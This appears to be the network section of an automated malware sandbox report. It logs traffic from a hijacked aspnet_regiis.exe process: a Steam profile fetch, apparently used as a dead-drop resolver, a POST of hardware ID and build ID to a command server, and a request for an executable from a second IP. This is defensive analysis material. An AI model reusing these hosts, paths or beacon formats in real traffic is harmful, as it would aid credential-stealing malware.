                                                                                                                                                                            Oct 3, 2024 03:27:12.608439922 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.608448029 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.608622074 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.608622074 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.616415024 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.616456032 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.618063927 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.618063927 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.618076086 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.619255066 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.649744987 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.649811983 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.649883032 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.649883032 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.649898052 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.650062084 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.671461105 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.671536922 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.671578884 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.671587944 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.671624899 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.671684980 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.671705008 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.671763897 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.671802044 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.671808004 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.671844959 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.671864986 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.671932936 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.671977043 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.672027111 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.672034025 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.672555923 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.672555923 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.678335905 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.678389072 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.678457022 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.678464890 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.679259062 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.679259062 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.688117027 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.688174009 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.688479900 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.688479900 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.688491106 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.689008951 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.696960926 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.697010994 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.698065042 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.698065996 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.698074102 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.699134111 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.705131054 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.705183029 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.705245018 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.705251932 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.705319881 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.705319881 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.738358974 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.738430023 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.738596916 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.738610029 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.738769054 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.760119915 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.760184050 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.760288000 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.760288000 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.760304928 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.760338068 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.760390997 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.760446072 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.760446072 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.760453939 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.760489941 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.760545969 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.760596037 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.760643959 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.760737896 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.760737896 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.760745049 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.760787010 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.766823053 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.766879082 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.766927958 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.766935110 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.767405033 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.767405033 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.776381016 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.776422977 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.776509047 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.776516914 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.776555061 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.776575089 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.785593033 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.785645962 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.785715103 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115058899 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115065098 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115168095 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115219116 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115245104 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115246058 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115246058 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115255117 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115346909 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115411997 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115411997 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115432978 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115436077 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115484953 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115556955 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115556955 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115566015 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115744114 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.121530056 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.121576071 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.121673107 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.121685982 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.121696949 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.121732950 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.142503977 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.142554045 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.142864943 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.142873049 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.143110037 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.152302027 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.152344942 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.152394056 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.152400970 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.152520895 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.152520895 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.191936016 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.192020893 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.192044973 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.192061901 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.192100048 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.192574978 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.203205109 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.203260899 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.203321934 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.203389883 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.203399897 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.203450918 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.203493118 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.203784943 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.203829050 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.203861952 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.203876972 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.203917027 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.203933001 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.204339027 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.204381943 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.204457998 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.204457998 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.204466105 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.204580069 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.204649925 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.204694033 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.204725981 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.204731941 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.204796076 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.204796076 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.210175037 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.210222960 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.210279942 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.210279942 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.210287094 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.210982084 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.231364012 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.231429100 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.231453896 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.231461048 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.231523991 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.231524944 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.241272926 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.241319895 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.241368055 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.241374969 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.241420984 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.241420984 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.280518055 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.280544043 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.280599117 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.280606985 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.280653000 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.280668020 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.291863918 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.291897058 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.292037010 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.292045116 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.292236090 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.292474985 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.292495966 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.292582035 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.292582035 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.292587996 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.292819977 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.293046951 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.293097019 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.293158054 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.293173075 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.293173075 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.293231964 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.293523073 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.293535948 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.995215893 CEST49729443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.995268106 CEST4434972949.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.995361090 CEST49729443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.995693922 CEST49729443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.995707035 CEST4434972949.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:14.650401115 CEST4434972949.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:14.650634050 CEST49729443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:14.651221037 CEST49729443192.168.2.949.12.197.9
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 3, 2024 03:26:42.385562897 CEST | 56492 | 53 | 192.168.2.9 | 1.1.1.1
Oct 3, 2024 03:26:42.392971039 CEST | 53 | 56492 | 1.1.1.1 | 192.168.2.9

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 3, 2024 03:26:42.385562897 CEST | 192.168.2.9 | 1.1.1.1 | 0x5425 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 3, 2024 03:26:42.392971039 CEST | 1.1.1.1 | 192.168.2.9 | 0x5425 | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false

• steamcommunity.com
• 49.12.197.9
• 147.45.44.104

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49735 | 147.45.44.104 | 80 | 1420 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Oct 3, 2024 03:27:25.089828014 CEST183OUTGET /ldms/a43486128347.exe HTTP/1.1
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 147.45.44.104
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Oct 3, 2024 03:27:25.798827887 CEST314INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:27:25 GMT
                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                            Content-Length: 13
                                                                                                                                                                            Last-Modified: Thu, 03 Oct 2024 01:25:21 GMT
                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                            Keep-Alive: timeout=120
                                                                                                                                                                            ETag: "66fdf281-d"
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            Data Raw: 55 6e 6b 6e 6f 77 6e 20 65 72 72 6f 72
                                                                                                                                                                            Data Ascii: Unknown error


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49711 | 104.102.49.254 | 443 | 1420 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:26:43 UTC | 119 | OUT | GET /profiles/76561199780418869 HTTP/1.1
Host: steamcommunity.com
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 01:26:43 UTC | 1870 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:26:43 GMT
                                                                                                                                                                            Content-Length: 34879
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Set-Cookie: sessionid=eeeb706698cee978f709a32b; Path=/; Secure; SameSite=None
                                                                                                                                                                            Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-03 01:26:43 UTC | 14514 | IN
                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-03 01:26:44 UTC | 16384 | IN
                                                                                                                                                                            Data Ascii: RT</a></div><script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4
2024-10-03 01:26:44 UTC | 3768 | IN
                                                                                                                                                                            Data Ascii: ummary"></div><div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><scr
2024-10-03 01:26:44 UTC | 213 | IN
                                                                                                                                                                            Data Ascii: ck="Responsive_RequestMobileView()"><span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49712 | 49.12.197.9 | 443 | 1420 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:26:45 UTC | 184 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 01:26:45 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:26:45 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
2024-10-03 01:26:45 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49713 | 49.12.197.9 | 443 | 1420 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:26:46 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAEC
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Content-Length: 256
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
2024-10-03 01:26:46 UTC | 256 | OUT
                                                                                                                                                                            Data Ascii: ------EHIJDHCAKKFCBGCBAAECContent-Disposition: form-data; name="hwid"77EAD8AC5E131019693163-a33c7340-61ca------EHIJDHCAKKFCBGCBAAECContent-Disposition: form-data; name="build_id"b74ef0d8ce56e494b0d83e1d5be9dbeb------EHIJDHCAKKFCBGCBAAEC--
2024-10-03 01:26:46 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:26:46 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
